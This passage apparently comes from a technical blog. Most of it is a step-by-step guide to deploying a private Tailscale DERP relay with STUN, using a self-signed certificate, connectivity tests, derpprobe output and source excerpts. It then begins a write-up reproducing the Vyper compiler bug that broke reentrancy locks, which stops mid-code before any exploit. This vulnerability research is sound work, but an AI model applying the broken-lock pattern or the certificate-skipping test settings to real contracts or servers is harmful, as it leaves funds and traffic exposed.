// 3. Send the public IP:port the server saw on the UDP connection, together with the txid, back to the client
addr, _ := netip.AddrFromSlice(ua.IP)
res := stun.Response(txid, netip.AddrPortFrom(addr, uint16(ua.Port)))
_, err = pc.WriteTo(res, ua)
...
}
}

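This STUN service is very simple. It performs only the simplest part of NAT detection: telling the client what it looks like from the server's public vantage point.

But hole punching is not that simple. Tailscale also uses discovery messages over the DERP service as a side channel, plus other NAT detection tricks, to do NAT traversal.

A Tailscale blog link belongs here, and it is well worth clicking through: How NAT traversal works - Tailscale Blog. That said, I recommend this translation even more: [译] NAT 穿透是如何工作的：技术原理及企业级实践（Tailscale, 2020）- arthurchiao's blog, which is very easy to follow.

I do not plan to cover Tailscale's whole hole-punching logic here, because the focus remains on setting up the DERP service; see the articles above for details, and the techniques are too intricate to summarize briefly anyway. STUN is mentioned only to point out that Tailscale's STUN service needs just one open UDP port and has no other demanding conditions.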
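To show what "tell the peer its IP:port" looks like on the wire, here is a minimal sketch of a generic STUN Binding Request and Binding Success response as laid out in RFC 5389. The function names are hypothetical and this is not Tailscale's stun package. Note also that derper's request parser may reject a bare request that lacks the extra attributes Tailscale clients attach, so treat this only as an illustration of the message shape.

```python
import os
import socket
import struct

MAGIC_COOKIE = 0x2112A442      # fixed value defined by RFC 5389
BINDING_REQUEST = 0x0001
BINDING_SUCCESS = 0x0101
XOR_MAPPED_ADDRESS = 0x0020


def build_binding_request(txid=None):
    """Return (txid, packet) for a bare 20-byte STUN Binding Request."""
    txid = txid or os.urandom(12)
    header = struct.pack("!HHI", BINDING_REQUEST, 0, MAGIC_COOKIE)
    return txid, header + txid


def build_binding_response(txid, ip, port):
    """Build a Binding Success response carrying an IPv4 XOR-MAPPED-ADDRESS."""
    addr = struct.unpack("!I", socket.inet_aton(ip))[0]
    value = struct.pack("!BBHI", 0, 0x01, port ^ (MAGIC_COOKIE >> 16), addr ^ MAGIC_COOKIE)
    attr = struct.pack("!HH", XOR_MAPPED_ADDRESS, len(value)) + value
    header = struct.pack("!HHI", BINDING_SUCCESS, len(attr), MAGIC_COOKIE)
    return header + txid + attr


def parse_binding_response(packet, txid):
    """Return (ip, port) from an IPv4 XOR-MAPPED-ADDRESS, or None."""
    if len(packet) < 20:
        return None
    msg_type, msg_len, cookie = struct.unpack("!HHI", packet[:8])
    if msg_type != BINDING_SUCCESS or cookie != MAGIC_COOKIE or packet[8:20] != txid:
        return None
    offset, end = 20, min(len(packet), 20 + msg_len)
    while offset + 4 <= end:
        attr_type, attr_len = struct.unpack("!HH", packet[offset:offset + 4])
        value = packet[offset + 4:offset + 4 + attr_len]
        if attr_type == XOR_MAPPED_ADDRESS and len(value) >= 8 and value[1] == 0x01:
            xport, xaddr = struct.unpack("!HI", value[2:8])
            ip = socket.inet_ntoa(struct.pack("!I", xaddr ^ MAGIC_COOKIE))
            return ip, xport ^ (MAGIC_COOKIE >> 16)
        offset += 4 + attr_len + (-attr_len) % 4  # attributes are 4-byte aligned
    return None


# Local round trip with a documentation-range address (no network involved).
txid, request = build_binding_request()
response = build_binding_response(txid, "203.0.113.7", 41641)
print(len(request), parse_binding_response(response, txid))
```

The transaction ID is what lets a client match a response to its request, which is the "avoid mismatched messages" role noted in the listener code above.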

IV. Test Setup for DERP

1. Install the derper service

# Download the latest release from https://go.dev/dl/ (be sure to use a downloaded release rather than apt-get install golang)
wget https://go.dev/dl/go1.21.3.linux-amd64.tar.gz
rm -rf /usr/local/go && tar -C /usr/local -xzf go1.21.3.linux-amd64.tar.gz
rm go1.21.3.linux-amd64.tar.gz
export PATH=$PATH:/usr/local/go/bin

# Confirm the installation succeeded
go version
# Check that GOROOT and GOPATH are non-empty and accessible
go env

# Configure a Go proxy and install
go env -w GOPROXY=https://goproxy.cn,direct
go install tailscale.com/cmd/derper@latest
# Install derpprobe to help test derper
go install tailscale.com/cmd/derpprobe@latest

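2. Create a self-signed certificate

The self-signed certificate is mainly there to placate derper so that it serves HTTPS; you could also patch derper to get around this restriction, but that would make later derper updates inconvenient.

A few things to note when creating the self-signed certificate:

First pick any HostName; I chose kiprey-derp. Be sure to remember it, because certificate signing, requests, and so on will all use it later.
After the certificate is generated, the private key and certificate files must both be named with the HostName as prefix.

mkdir ~/certdir && cd ~/certdir
# 1. Generate the private key
$ DERP_HOST="kiprey-derp"
$ openssl genpkey -algorithm RSA -out ${DERP_HOST}.key
...

# 2. Generate the certificate signing request (CSR):
$ openssl req -new -key ${DERP_HOST}.key -out ${DERP_HOST}.csr
# Just press Enter to leave every field empty.

# 3. Generate the self-signed certificate with a 100-year validity so this never needs redoing
$ openssl x509 -req \
-days 36500 \
-in ${DERP_HOST}.csr \
-signkey ${DERP_HOST}.key \
-out ${DERP_HOST}.crt \
-extfile <(printf "subjectAltName=DNS:${DERP_HOST}")

# 4. Inspect the generated certificate
$ openssl x509 -in ${DERP_HOST}.crt -noout -text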
Certificate:
    Data:
        Version: 3 (0x2)
        ...
        Issuer: C = AU, ST = Some-State, O = Internet Widgits Pty Ltd
        Validity
            Not Before: Nov 12 05:17:34 2023 GMT
            Not After : Oct 19 05:17:34 2123 GMT
        Subject: C = AU, ST = Some-State, O = Internet Widgits Pty Ltd
        ...
        X509v3 extensions:
            X509v3 Subject Alternative Name: 
                DNS:kiprey-derp
            ...
    ...

3. Run the derper service

# Start derper
# derper automatically listens on HTTP once HTTPS is enabled, so set the HTTP port to -1 to disable it
~/go/bin/derper \
    -c ~/.derper.key \
    -a :8888 -http-port -1 \
    -stun-port 8889 \
    -hostname ${DERP_HOST} \
    --certmode manual \
    -certdir ~/certdir \
    --verify-clients

4. Test connectivity

The connectivity test for the DERP service over HTTPS looks like this:

unset all_proxy http_proxy https_proxy
# --insecure means TLS-insecure (skip certificate verification)
# --resolve pins DERP_HOST to the local 127.0.0.1
$ curl --insecure --resolve "${DERP_HOST}:8888:127.0.0.1" "https://${DERP_HOST}:8888"

DERP

  This is a
  <a href="https://tailscale.com/">Tailscale</a>
  <a href="https://pkg.go.dev/tailscale.com/derp">DERP</a>
  server.

Debug info at <a href='/debug/'>/debug/</a>.

# Test connectivity of the STUN service over UDP
$ nc 127.0.0.1 8889 -v -u
Connection to 127.0.0.1 8889 port [udp/*] succeeded!

Be sure to disable any proxy while testing! Otherwise requests to localhost go through the proxy, resulting in:
curl: (35) error:0A000126:SSL routines::unexpected eof while reading

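Note that the DERP HTTPS service can only be reached using the HostName given earlier as DERP_HOST, because the DERP service checks each client connection and makes sure the ServerName sent by the client matches the hostname of the local certificate: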

// cmd/derper/derper.go
// --------------------
func main() {
...
if serveTLS {
log.Printf("derper: serving on %s with TLS", *addr)
var certManager certProvider
certManager, err = certProviderByCertMode(*certMode, *certDir, *hostname)
if err != nil {
log.Fatalf("derper: can not start cert provider: %v", err)
}
httpsrv.TLSConfig = certManager.TLSConfig()

    // 1. On each client connection, try to obtain the certificate based on the ClientHello info
getCert := httpsrv.TLSConfig.GetCertificate
httpsrv.TLSConfig.GetCertificate = func(hi *tls.ClientHelloInfo) (*tls.Certificate, error) {
cert, err := getCert(hi)
if err != nil {
return nil, err
}
cert.Certificate = append(cert.Certificate, s.MetaCert())
return cert, nil
}
    ...
...
}

// cmd/derper/cert.go
// ------------------
func (m *manualCertManager) getCertificate(hi *tls.ClientHelloInfo) (*tls.Certificate, error) {
// 2. When fetching the certificate, first check that the ServerName requested by the client matches the locally configured hostname
  if hi.ServerName != m.hostname {
return nil, fmt.Errorf("cert mismatch with hostname: %q", hi.ServerName)
}

// Return a shallow copy of the cert so the caller can append to its
// Certificate field.
certCopy := new(tls.Certificate)
*certCopy = *m.cert
certCopy.Certificate = certCopy.Certificate[:len(certCopy.Certificate):len(certCopy.Certificate)]
return certCopy, nil
}

So when testing with curl, the --resolve flag is needed so that requests to DERP_HOST end up resolving to the local address:

curl --insecure --resolve "${DERP_HOST}:8888:127.0.0.1" "https://${DERP_HOST}:8888"
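The same check can be scripted. Below is a minimal Python sketch of what `curl --insecure --resolve` does here: dial an explicit IP, send the chosen hostname as the TLS ServerName (SNI), and skip certificate verification. The function names `make_insecure_context` and `fetch_root` are hypothetical, and the address, port, and hostname in the commented call are simply this article's example values.

```python
import socket
import ssl


def make_insecure_context():
    """TLS context that skips certificate checks, like curl --insecure."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False       # must be disabled before verify_mode
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def fetch_root(ip, port, sni_host, timeout=5.0):
    """Connect to ip:port, present sni_host as the ServerName, and GET /."""
    ctx = make_insecure_context()
    with socket.create_connection((ip, port), timeout=timeout) as raw:
        # server_hostname controls the SNI value that derper compares
        # against its configured hostname.
        with ctx.wrap_socket(raw, server_hostname=sni_host) as tls:
            request = (
                f"GET / HTTP/1.1\r\nHost: {sni_host}:{port}\r\n"
                "Connection: close\r\n\r\n"
            )
            tls.sendall(request.encode("ascii"))
            chunks = []
            while True:
                data = tls.recv(4096)
                if not data:
                    break
                chunks.append(data)
    return b"".join(chunks)


# Example call (needs a running derper; values are this article's examples):
# print(fetch_root("127.0.0.1", 8888, "kiprey-derp").decode(errors="replace"))
```

Passing a different `sni_host` than the one derper was started with should make the handshake fail, which matches the hostname check in getCertificate shown above.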

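Opened directly in a browser, the page is fairly minimal:

Note: to open this HTTPS service in a browser, either map the address or create another certificate with DERP_HOST=localhost; I will not go into that here.

Clicking /debug opens some debugging pages; clicking further reveals the debug counters that are set throughout the source code. We can use these fields to indirectly judge whether DERP/STUN is working properly.

This is very useful, because it lets us confirm that the DERP and STUN services can be given the same port and still work (since one uses TCP and the other UDP):

After connecting with nc, not_stun started at 5 and rose to 8 after three lines of data were sent.

So the ZeroTier approach can be applied directly to a Tailscale DERP server (mix-port).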

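5. Protecting the debug endpoints

For security, we would like to turn this debug mode off in a real deployment. How?

In fact we need not worry about it. tsweb/tsweb.go#L53 shows that debug requests are let through only if they meet one of these conditions:

The request comes from a loopback IP, a Tailscale IP, or the IP specified by TS_ALLOW_DEBUG_IP (and carries no X-Forwarded-For header).
The request uses the GET method and carries a debugkey whose value matches the content of the file specified by TS_DEBUG_KEY_PATH.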

// AllowDebugAccess reports whether r should be permitted to access
// various debug endpoints.
func AllowDebugAccess(r *http.Request) bool {
if allowDebugAccessWithKey(r) {
return true
}
if r.Header.Get("X-Forwarded-For") != "" {
// TODO if/when needed. For now, conservative:
return false
}
ipStr, _, err := net.SplitHostPort(r.RemoteAddr)
if err != nil {
return false
}
ip, err := netip.ParseAddr(ipStr)
if err != nil {
return false
}
if tsaddr.IsTailscaleIP(ip) || ip.IsLoopback() || ipStr == envknob.String("TS_ALLOW_DEBUG_IP") {
return true
}
return false
}

func allowDebugAccessWithKey(r *http.Request) bool {
if r.Method != "GET" {
return false
}
urlKey := r.FormValue("debugkey")
keyPath := envknob.String("TS_DEBUG_KEY_PATH")
if urlKey != "" && keyPath != "" {
slurp, err := os.ReadFile(keyPath)
if err == nil && string(bytes.TrimSpace(slurp)) == urlKey {
return true
}
}
return false
}

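The actual test looks like this:

6. Write the DERP map

In this article, to keep DERP and STUN clearly apart, the two services are not assigned the same port for now.

For writing the DERP map, see the official reference: derp-map - tailscale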

{
    "Regions": {
      "233": {
        "RegionID": 233,
        "RegionCode": "useless-region-code",
        "Nodes": [
          {
            "Name": "test-derp",
            "RegionID": 233,
            "HostName": "kiprey-derp",
            "IPv4": "127.0.0.1",
            "IPv6": "::1",
            "DERPPort": 8888,
            "STUNPort": 8889,
            "InsecureForTests": true
          }
        ]
      }
    }
  }

Note: HostName is set to the DERP_HOST chosen earlier and is passed to the server for checking; InsecureForTests makes the client skip certificate verification.

Save it as derp-map.json and run:

$ ~/go/bin/derpprobe -derp-map file://$HOME/derp-map.json -once
2023/11/12 15:01:38 Waiting for all probes (may take up to 1m)
2023/11/12 15:01:40 adding DERP TLS probe for test-derp ()
2023/11/12 15:01:40 adding DERP UDP probe for test-derp (derp/useless-region-code/test-derp/udp6)
2023/11/12 15:01:40 adding DERP UDP probe for test-derp (derp/useless-region-code/test-derp/udp)
2023/11/12 15:01:40 adding DERP mesh probe for test-derp->test-derp ()
2023/11/12 15:01:41 probe derp/useless-region-code/test-derp/tls: connecting to "kiprey-derp:443": dial tcp: lookup kiprey-derp on 127.0.0.53:53: server misbehaving
2023/11/12 15:01:47 probe derp/useless-region-code/test-derp/test-derp/mesh: derp.Recv: EOF
2023/11/12 15:01:54 good: derp/useless-region-code/test-derp/udp6: 667.205µs
2023/11/12 15:01:54 good: derp/useless-region-code/test-derp/udp: 2.71478ms
2023/11/12 15:01:54 good: derpmap-probe: 5.609009ms
2023/11/12 15:01:54 bad: derp/useless-region-code/test-derp/test-derp/mesh: derp.Recv: EOF
2023/11/12 15:01:54 bad: derp/useless-region-code/test-derp/tls: connecting to "kiprey-derp:443": dial tcp: lookup kiprey-derp on 127.0.0.53:53: server misbehaving

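What derpprobe probes

First, a brief description of what derpprobe probes. It mainly checks the following three things (implemented in prober/derp.go):

DERP TLS probe: only checks whether a TLS connection to the DERP server under test can be established; it does not probe application-layer data (prober/derp.go#L58 & prober/derp.go#L97 & prober/tls.go#L29).
DERP UDP probe: checks whether the UDP-based STUN service on the DERP server under test works (once each for IPv4 and IPv6; it sends and receives data) (prober/derp.go#L113 & prober/derp.go#L206).
DERP mesh probe: checks whether data forwarding between the DERP server under test and the other DERP servers in the same Region works (prober/derp.go#L122 & prober/derp.go#L139 & prober/derp.go#L295).

The output contains errors, of two kinds:

TLS connection failure. Reading the source shows that the DERP TLS probe connects to the DERP server in an unorthodox way: its connection logic is completely different from a regular client's, it only connects to the HostName field from the configuration and ignores the IPv4/IPv6 fields (prober/derp.go#L97), and it does not honor InsecureForTests to turn off certificate verification. So the TLS probe error cannot be fixed; it is harmless, though.
The prober fails to connect to the DERP service. The DERP service keeps logging errors like this:
2023/XX/XX XX:XX:XX derp: 127.0.0.1:50566: client xxxxx rejected: client nodekey:xxxxx not in set of peers
Debugging showed that the client key used by the prober is randomly generated, so with --verify-clients set DERP rejects the prober's connection. Remove this flag from the DERP service while testing; the final result looks like this: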

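A few key points about using the prober:

In the figure above I ran derpprobe directly from the latest source rather than as a binary built via go install. At the time, derpprobe happened to be getting a bug fix, and the fixed code had not yet been published to the Go package, so I ran the source directly.
Always clear proxy settings when using the prober; otherwise HTTPS requests that should succeed get "hijacked" somewhere odd and the probe fails:

That concludes the derpprobe tests. Next comes actually deploying into a Tailscale network for testing.

How the DERP mesh probe works

As an aside, here is how the DERP mesh probe works, which is rather interesting. Its purpose is to test data forwarding when different clients connect to the same Region (cluster), especially the case where clients connect to the same Region but to different Region nodes. The test proceeds as follows:

To avoid confusion: client1 and client2 are two different client nodes outside the DERP service; sclient1 and sclient2 are the two structs created inside the DERP service to interact with client1 and client2.

Initially, in derpProbeNodePair the prober creates two client structs connected to different Regions: client1 (connected to derp1) and client2 (connected to derp2). The two clients use different key pairs, pretending to be two independent nodes connecting to different DERP servers.
But the code is only given two different nodes in the same Region, so how does it connect to different Regions? In fact, the prober disguises these DERP nodes as nodes from different Regions (prober/derp.go#L364; note that each returned DERPRegion has only the single passed-in node in Nodes, and the identical RegionID does not matter).
On the other side, when the remote DERP service receives a client's connection request, it calls registerClient:
1. It keeps an sclient struct locally in the DERP service, holding each client connection's state and its not-yet-sent messages.
  One sclient on the DERP side pairs with one derphttp.Client on the client side.
2. It broadcasts the client's presence (for example whether it is online, its remote IP address, and so on; broadcastPeerStateChangeLocked function) to other DERP clients that are watching this DERP service's connection state.
Next, the prober has client1 send 8 random bytes to client2 and expects to receive the same data from client2. The actual data flow should be client1 → derp1 → derp2 → client2. Specifically:
1. When the prober has client1 send data, client1 calls derp_client.Send, which prefixes the data with the frameSendPacket frame type and client2's dstKey as the destination, forming a frame packet.
2. client1 first sends this frame packet to derp1 (because client1 does not know client2's address).
3. On receiving the frame packet, derp1 handles it in handleFrameSendPacket.
  1. If client1 and client2 are connected to the same Region (that is, derp1 and derp2 are the same server and we only separate them logically), derp1 holds the sclient2 struct for client2 and sends the raw packet to sclient2 directly.
    The raw packet carries the key of the original source node (in practice the public key each node holds), which amounts to storing the sender's ID in the raw packet.
    On receiving the raw packet, sclient2 generates a frameRecvPacket for client2. client2 can then call Recv to obtain the data other nodes sent to it.
  2. If client1 and client2 are connected to separate Regions, derp1 does not know client2's address either, so it looks up the forwarder handle that does (here, an sclient struct connected to derp2). The message is passed from derp1 to derp2 through that forwarder; derp2 hands it to sclient2, which finally sends it to client2.
    The forward happens only once, never a second time.
    So how does derp1 know that reaching client2 means going through derp2 first? This goes back to the client state broadcast in step 2 of registerClient above. When starting a derp service, flags can name other mesh nodes in the same Region; the derp service connects to each of those mesh derp nodes in turn and watches their client connection state, in order to maintain its own forwarding state.
    But that is getting too detailed, so there is no need to dig further.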
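The forwarding decision described above can be summarized with a toy model. This is a sketch under heavy simplification: `ToyDerp` and its methods are hypothetical names, the "network" is just Python method calls, and nothing here mirrors the real derp.Server types beyond the local-delivery versus forward-once logic.

```python
class ToyDerp:
    """Hypothetical stand-in for one DERP server; not the real derp.Server."""

    def __init__(self, name):
        self.name = name
        self.local = {}       # client key -> inbox list (plays the role of sclient)
        self.forwarders = {}  # client key -> peer ToyDerp that holds that client

    def register_client(self, key, mesh_peers=()):
        """Record a local client and announce it to watching mesh peers."""
        self.local[key] = []
        for peer in mesh_peers:
            peer.forwarders[key] = self

    def handle_send_packet(self, src_key, dst_key, data, forwarded=False):
        """Deliver locally if possible, otherwise forward at most once."""
        if dst_key in self.local:
            # The source key travels with the packet so the receiver
            # knows who sent it.
            self.local[dst_key].append((src_key, data))
            return True
        fwd = self.forwarders.get(dst_key)
        if fwd is not None and not forwarded:
            return fwd.handle_send_packet(src_key, dst_key, data, forwarded=True)
        return False  # unknown destination, or already forwarded once: drop


derp1, derp2 = ToyDerp("derp1"), ToyDerp("derp2")
derp1.register_client("client1", mesh_peers=[derp2])
derp2.register_client("client2", mesh_peers=[derp1])

payload = bytes(range(8))  # the prober sends 8 random bytes; fixed here
delivered = derp1.handle_send_packet("client1", "client2", payload)
print(delivered, derp2.local["client2"])
```

The `forwarded` flag models the "forward only once" rule: a packet that has already crossed one mesh hop is never relayed again, which prevents loops between servers.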

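V. Setting Up a Tailscale Debugging Environment

To single-step through the relevant logic, clone the tailscale repository locally and debug there; the copy under ~/go/pkg/mod/tailscale.com@v1.50.1 cannot be used directly because that directory is not writable.

The VS Code launch.json I use is below. Note that program can only point to a directory, not to a specific Go file, because otherwise the debugger cannot find the other Go files in a multi-file project and symbols go missing: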

{
    // Use IntelliSense to learn about possible attributes.
    // Hover to view descriptions of existing attributes.
    // For more information, visit: https://go.microsoft.com/fwlink/?linkid=830387
    "version": "0.2.0",
    "configurations": [
        {
            "name": "Launch derpprobe",
            "type": "go",
            "request": "launch",
            "mode": "auto",
            "program": "cmd/derpprobe",
            "args": [
                "-derp-map", "file:///home/kiprey/derp-map.json",
                "-once"
            ],
            "cwd": "${workspaceFolder}",
            "env": {
                // Clear proxy settings
                "ALL_PROXY": null, "all_proxy": null,
                "HTTP_PROXY": null, "http_proxy": null,
                "HTTPS_PROXY": null, "https_proxy": null,
            }
        },
        {
            "name": "Launch derp",
            "type": "go",
            "request": "launch",
            "mode": "auto",
            "program": "cmd/derper",
            "args": [
                "-c", "/home/kiprey/.derper.key",
                "-a", ":8888", "-stun-port", "8889", 
                "-http-port", "-1",

                "-hostname", "kiprey-derp",
                "--certmode", "manual",
                "-certdir", "./certdir",
            ],
            "cwd": "${workspaceFolder}",
        }
    ]
}

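VI. DERP Setup Summary and Demo

This section pulls together everything above and describes, start to finish and as briefly as possible, how to set up a DERP server.

To repeat: the Tailscale version used here is v1.52.1 (2023/11/11), git commit 86c8ab75.

I stress the Tailscale version because Tailscale iterates quickly, and this article may no longer apply in a year or two (facepalm).

1. Prerequisites

There is only one requirement: a public TCP channel that lets TLS traffic through, plus a public UDP channel.

No domain name, no CA-issued TLS certificate, no source code changes, and no self-hosted Headscale are needed; any NAT traversal service will do.

That is rather abstract. In practice it means either one TCP port and one UDP port, or a single port that allows both TCP and UDP (mix-port). If you only want the DERP relay and not STUN, the UDP port is not needed.

Either way, the TCP port must not block TLS traffic. Such restrictions usually come from the ISP (for example when deploying on a residential public IP) or from the NAT traversal provider (who is responsible for what passes through and may require identity verification or similar before allowing users' TLS traffic).

2. Install DERP

Run all of the following commands on the DERP server.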

# Download the latest release from https://go.dev/dl/ (be sure to use a downloaded release rather than apt-get install golang)
wget https://go.dev/dl/go1.21.4.linux-amd64.tar.gz
sudo rm -rf /usr/local/go && sudo tar -C /usr/local -xzf go1.21.4.linux-amd64.tar.gz
rm go1.21.4.linux-amd64.tar.gz
export PATH=$PATH:/usr/local/go/bin

# Confirm the installation succeeded
go version
# Check that GOROOT and GOPATH are non-empty and accessible
go env

# Configure a Go proxy and install
go env -w GOPROXY=https://goproxy.cn,direct
go install tailscale.com/cmd/derper@latest
# Install derpprobe to help test derper
go install tailscale.com/cmd/derpprobe@latest

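3. Start DERP

Expose the ports to the public internet. This can be done through NAT traversal, or by configuring iptables rules on a machine that is already publicly reachable:

Note: iptables rules are evaluated in order, so be sure to insert these before the DROP all rule.

# Allow inbound TCP: insert a rule accepting TCP connections with dest-port 8888 at position 10 of the INPUT chain
sudo iptables -I INPUT 10 -p tcp --dport 8888 -j ACCEPT
# Allow inbound UDP: insert a rule accepting UDP packets with dest-port 8889 at position 10 of the INPUT chain
sudo iptables -I INPUT 10 -p udp --dport 8889 -j ACCEPT

# --------------
# Inspect iptables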
$ sudo iptables -L -n
Chain INPUT (policy ACCEPT)
target     prot opt source               destination
ACCEPT     icmp --  0.0.0.0/0            0.0.0.0/0
...
ACCEPT     udp  --  0.0.0.0/0            0.0.0.0/0            udp dpt:8889
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0            tcp dpt:8888
DROP       all  --  0.0.0.0/0            0.0.0.0/0

Next, configure and start the DERP service.

# Set DERP_HOST to kiprey-derp (used later)
DERP_HOST="kiprey-derp"
DERP_PORT=8888
STUN_PORT=8889

# Create the self-signed certificate
mkdir ~/certdir && cd ~/certdir
openssl genpkey -algorithm RSA -out ${DERP_HOST}.key   
openssl req -new -key ${DERP_HOST}.key -out ${DERP_HOST}.csr
openssl x509 -req \
-days 36500 \
-in ${DERP_HOST}.csr \
-signkey ${DERP_HOST}.key \
-out ${DERP_HOST}.crt \
-extfile <(printf "subjectAltName=DNS:${DERP_HOST}")

# Start the DERP service (relay and STUN)
# --verify-clients requires tailscaled running locally; installing tailscale is omitted here
~/go/bin/derper \
    -c ~/.derper.key \
    -a :${DERP_PORT} -http-port -1 \
    -stun-port ${STUN_PORT} \
    -hostname ${DERP_HOST} \
    --certmode manual \
    -certdir ~/certdir \
    --verify-clients

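After starting the DERP service, test connectivity from another machine:

# DERP_HOST here must match the one on the DERP server
DERP_HOST="kiprey-derp"

# Below is the DERP service as seen from the public internet, i.e. the address and ports to reach it on.
# With port forwarding, these ports differ from the ones the DERP service listens on locally; adjust as needed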
DERP_PUB_IP="a.b.c.d"
DERP_PUB_PORT=8888
STUN_PUB_PORT=8889

$ unset all_proxy http_proxy https_proxy
$ curl --insecure --resolve "${DERP_HOST}:${DERP_PUB_PORT}:${DERP_PUB_IP}" "https://${DERP_HOST}:${DERP_PUB_PORT}"


DERP

  This is a
  <a href="https://tailscale.com/">Tailscale</a>
  <a href="https://pkg.go.dev/tailscale.com/derp">DERP</a>
  server.


# Test connectivity of the STUN service over UDP
$ nc ${DERP_PUB_IP} ${STUN_PUB_PORT} -v -u

Connection to a.b.c.d e port [udp/*] succeeded!

Once the connectivity checks pass, stop the derp service on the DERP server and create a systemd service so that it starts at boot:

DERP_HOST="kiprey-derp"
DERP_PORT=8888
STUN_PORT=8889

# Create the service file
echo "[Unit]
Description=Tailscale derp service
After=network.target

[Service]
ExecStart=/home/${USER}/go/bin/derper \
    -c /home/${USER}/.derper.key \
    -a :${DERP_PORT} -http-port -1 \
    -stun-port ${STUN_PORT} \
    -hostname ${DERP_HOST} \
    --certmode manual \
    -certdir /home/${USER}/certdir \
    --verify-clients
Restart=always
User=${USER}

[Install]
WantedBy=multi-user.target" \
| sudo tee /etc/systemd/system/tailscale-derp.service

# Reload the systemd configuration
sudo systemctl daemon-reload

# Start the service and enable it at boot
sudo systemctl start tailscale-derp
sudo systemctl enable tailscale-derp

# Check the service status; all good if nothing is reported
# If something is wrong, check whether the earlier derper was left running and is holding the port
sudo systemctl status tailscale-derp

# -------------------
# To disable
sudo systemctl stop tailscale-derp
sudo systemctl disable tailscale-derp

At this point, the DERP service is fully configured.

4. Configure the ACL

Next, go to the Tailscale admin panel and edit the ACL to update the configuration of all Tailscale nodes.

...
{
...
"acls": [...],
...
"ssh": [...],
  ...
"derpMap": {
"Regions": {
"900": {
"RegionID":   900,
"RegionCode": "MyDerp",
"Nodes": [
{
"Name":             "MyDerp-Name",
"RegionID":         900,
"HostName":         "kiprey-derp",
"IPv4":             "a.b.c.d",
"DERPPort":         8888,
"STUNPort":         8889,
"InsecureForTests": true,
},
],
},
},
},
  ...
}

5. Demo

Once the ACL is saved on the web page, it is pushed to every Tailscale node immediately. Run netcheck on any node to see that the DERP server has been added:

VII. References

DERP Servers - Tailscale Documentation
Tailscale 基础教程：部署私有 DERP 中继服务器 - 云原生
Custom DERP Servers - Tailscale Documentation
p2p的原理和常见的实现方式 - cppblog
How NAT traversal works - Tailscale Blog
The various code referenced above, plus other minor blogs not recorded here

Reproducing the Curve Finance Vulnerability

2023-08-09T16:00:00.000Z

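I. Introduction

Smart contracts play an important role in the blockchain world. This article records my reproduction of a compiler bug in Vyper, the Pythonic smart contract compiler; the bug rendered reentrancy locks in smart contracts ineffective, leaving contracts open to reentrancy attacks.

II. Environment Setup

1. Building Vyper

Download the Vyper compiler source and install the dependencies with pip.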

git clone git@github.com:vyperlang/vyper.git
cd vyper

# Dependencies come from setup.py & requirements-docs.txt; do not copy them verbatim
pip3 install "asttokens>=2.0.5,<3" "pycryptodome>=3.5.1,<4" "semantic-version>=2.10,<3" "importlib-metadata" "wheel" "sphinx==4.5.0" "recommonmark==0.6.0" "sphinx_rtd_theme==0.5.2"

Run python3 -m vyper --help; it is fine as long as the help text prints normally:

$ python3 -m vyper --help
usage: __main__.py [-h] [--version] [--show-gas-estimates] [-f FORMAT] [--storage-layout-file STORAGE_LAYOUT [STORAGE_LAYOUT ...]]
                   [--evm-version {istanbul,berlin,london,paris,shanghai,cancun}] [--no-optimize] [--optimize {gas,codesize,none}] [--debug] [--no-bytecode-metadata]
                   [--traceback-limit TRACEBACK_LIMIT] [--verbose] [--standard-json] [--hex-ir] [-p ROOT_FOLDER] [-o OUTPUT_PATH]
                   input_files [input_files ...]

Pythonic Smart Contract Language for the EVM

positional arguments:
  input_files           Vyper sourcecode to compile

options:
  -h, --help            show this help message and exit
  --version             show program's version number and exit
  ...

Finally, check out the commit that introduced the vulnerability:

# https://github.com/vyperlang/vyper/commit/a09cdddd8ba249d1ce68ac31ec4496e50b8a25c7
git checkout a09cdddd

To step through the compiler in a debugger, you also need to:

# In the vyper project root
cp ./vyper/__main__.py vyper.py
python3 vyper.py --help

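2. Downloading the contract

The contract code can be found at its on-chain address, for example https://bscscan.com/address/0x245a45cdf2271d026976811a80c091fe5b49ac40#code

The contract is open source, so there is certainly more than one way to get its source. The link above is just one example.

III. Root Cause

1. The safe reentrancy-lock logic

Before looking at the root cause, let's review how the reentrancy lock state was maintained before the vulnerable commit.

A reentrancy lock needs a storage slot to hold its state. That is what the get_nonreentrant_lock function takes care of: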

# Before the vulnerable commit
def get_nonreentrant_lock(func_type, global_ctx):
    nonreentrant_pre = [["pass"]]
    nonreentrant_post = [["pass"]]
    if func_type.nonreentrant:
        nkey = global_ctx.get_nonrentrant_counter(func_type.nonreentrant)
        nonreentrant_pre = [["seq", ["assert", ["iszero", ["sload", nkey]]], ["sstore", nkey, 1]]]
        nonreentrant_post = [["sstore", nkey, 0]]
    return nonreentrant_pre, nonreentrant_post

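As the code shows, when a function is marked non-reentrant, Vyper emits the IR above wherever the contract logic needs the lock. The IR is simple: acquiring the lock asserts that the slot is 0 and then sets it to 1; releasing the lock resets the slot to 0.

The slot that stores the lock state comes from global_ctx.get_nonrentrant_counter, the very function that the vulnerable commit marked as dead code. It picks the slot based on the key passed in: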

def get_nonrentrant_counter(self, key):
    """
    Nonrentrant locks use a prefix with a counter to minimise deployment cost of a contract.

    We're able to set the initial re-entrant counter using the sum of the sizes
    of all the storage slots because all storage slots are allocated while parsing
    the module-scope, and re-entrancy locks aren't allocated until later when parsing
    individual function scopes. This relies on the deprecated _globals attribute
    because the new way of doing things (set_data_positions) doesn't expose the
    next unallocated storage location.
    """
    if key in self._nonrentrant_keys:
        return self._nonrentrant_keys[key]
    else:
        counter = (
            sum(v.size for v in self._globals.values() if not isinstance(v.typ, MappingType))
            + self._nonrentrant_counter
        )
        self._nonrentrant_keys[key] = counter
        self._nonrentrant_counter += 1
        return counter

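For a non-reentrant function, this key is the string given in the Vyper source, such as the string lock in the code below. It is what distinguishes one reentrancy lock from another: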

@external
@nonreentrant('lock')
def add_liquidity() -> uint256:
    return 0

@external
@nonreentrant('lock')
def exchange() -> uint256:
   return 0

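In short, before the vulnerable commit Vyper told reentrancy locks apart by the string in the decorator, and it did so by using that string to choose the slot that stores the lock state. As a result, functions that use a lock with the same name share one slot, which is what protects them against reentrancy across functions.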
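The key-to-slot mapping described above can be modeled in a few lines of Python. This is only a toy sketch, not Vyper code: the class name KeyedLockAllocator and the globals_size parameter are made up for illustration, and the slot arithmetic is simplified to "size of the globals plus a counter".

```python
# Toy model (not Vyper code): one storage slot per distinct lock *key*.
class KeyedLockAllocator:
    def __init__(self, globals_size):
        # Lock slots are appended after the regular storage variables.
        self.globals_size = globals_size
        self.slots = {}

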